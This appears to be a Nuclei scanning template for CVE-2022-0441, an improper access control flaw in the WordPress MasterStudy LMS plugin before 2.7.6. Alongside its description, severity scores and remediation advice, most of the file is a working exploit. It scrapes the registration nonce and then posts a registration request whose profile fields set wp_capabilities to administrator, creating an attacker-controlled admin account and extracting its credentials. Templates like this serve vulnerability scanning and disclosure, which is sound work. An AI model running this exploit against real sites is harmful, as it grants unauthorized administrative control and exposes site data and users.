id: CVE-2022-0441 info: name: MasterStudy LMS <2.7.6 - Improper Access Control author: dwisiswant0,theamanrawat severity: critical description: | WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially compromising user data and system integrity. remediation: | Upgrade to the latest version of the MasterStudy LMS plugin (2.7.6 or higher) to fix the improper access control issue. reference: - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed - https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ - https://plugins.trac.wordpress.org/changeset/2667195 - https://nvd.nist.gov/vuln/detail/CVE-2022-0441 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0441 cwe-id: CWE-269,NVD-CWE-Other epss-score: 0.18749 epss-percentile: 0.95773 cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: stylemixthemes product: masterstudy_lms framework: wordpress tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" password: "{{rand_text_alphanumeric(12)}}" user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json {"user_login":"{{username}}","user_email":"{{user_email}}","user_password":"{{password}}","user_password_re":"{{password}}","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}} matchers-condition: and matchers: - type: word part: body_2 words: - 'Registration completed successfully' - '"status":"success"' condition: and - type: word part: header_2 words: - application/json; - type: status status: - 200 extractors: - type: regex name: nonce group: 1 regex: - '"stm_lms_register":"([0-9a-z]+)"' internal: true - type: kval kval: - user_email - password # digest: 490a0046304402203caca1b89d86590813202b8fb8752d8e0d84157f28710d4492b7e22778ac5c78022045ea5b6076b1d2f19237369bf18a703837516bd3cc14a5d7f6a461cd9918b15f:922c64590222798bb761d5b6d8e72950